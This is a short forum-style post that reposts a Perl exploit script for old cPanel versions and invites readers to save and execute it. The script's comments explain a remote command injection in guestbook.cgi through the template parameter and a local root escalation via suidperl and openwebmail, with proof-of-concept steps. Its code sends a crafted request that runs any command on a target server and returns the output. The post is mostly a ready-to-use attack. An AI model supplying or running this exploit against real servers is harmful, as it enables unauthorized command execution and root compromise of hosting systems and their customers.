Nothing Brand New Here -- More on the CPanel Exploit

2025-04-02

If you didn't understand how the exploit that was posted a few days ago worked ... they now have a perl script that will do everything for you (if you want to see the exploit works)

Just make this into a perl file, and execute.

http://www.securityfocus.com/archive...ment/312882/2/

Code:

#!/usr/bin/perl
#
# ------- start here -------
#
# Bug Founded by: pokleyzz
#
# Cpanel is web hosting control panel which allow client manage their web account through
# web interface. Most of the application are written in perl and  compiled to binary. 
#
# Details
# =======
# There is multiple vurnerabilities in this package as describe below.
# 
# 1) Remote command Execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
# 
# There is classic perl open function vulnerability in template variable which allow any 
# user to read any file or run command  as valid system user which assign to specific url 
# in apache configuration.
#
# 2) Local privileges escalation (root)
#
# Cpanel come with openwebmail packages as one of web base email reader which suid root.
# In the system with suid perl install perfectly (with suid mode turn on) local user may 
# include their own perl script when running openwebmail script (oom) through suidperl.
#
# Openwebmail will append perl include path (@INC) through SCRIPT_FILENAME environment variable,
# then include some file when execute.
#
# /usr/local/cpanel/base/openwebmail/oom line 14
#
# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
# if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
# push (@INC, $SCRIPT_DIR, ".");
# .
# .
# .
# require "openwebmail-shared.pl";
#
# proof of concept:
# i) Create file openwebmail-shared.pl contain perl script you want to execute.
# ii) Set SCRIPT_FILENAME point to full path of openwebmail-shared.pl file you just create.  
# iii) exec oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
#
# -------- cut here --------
#
# coded by cyzek. cyzek@efnet
# thanks for p0ng p0ng@brasnet.org
 
$url = $ARGV[0];
$cmd = $ARGV[1];
if(@ARGV != 2){
print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.\n";
print " use %20 for spaces.\n";
print " usage: $0 <host> <cmd>\n";
exit;
}
use IO::Socket::INET;
$rem = IO::Socket::INET->new(
Proto       => "tcp",
PeerAddr    => $url,
PeerPort    => "80");
if ($rem) { 
print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 \n\r\n\r\n\r";
@resp = <$rem>;
}
print "@resp\n\n";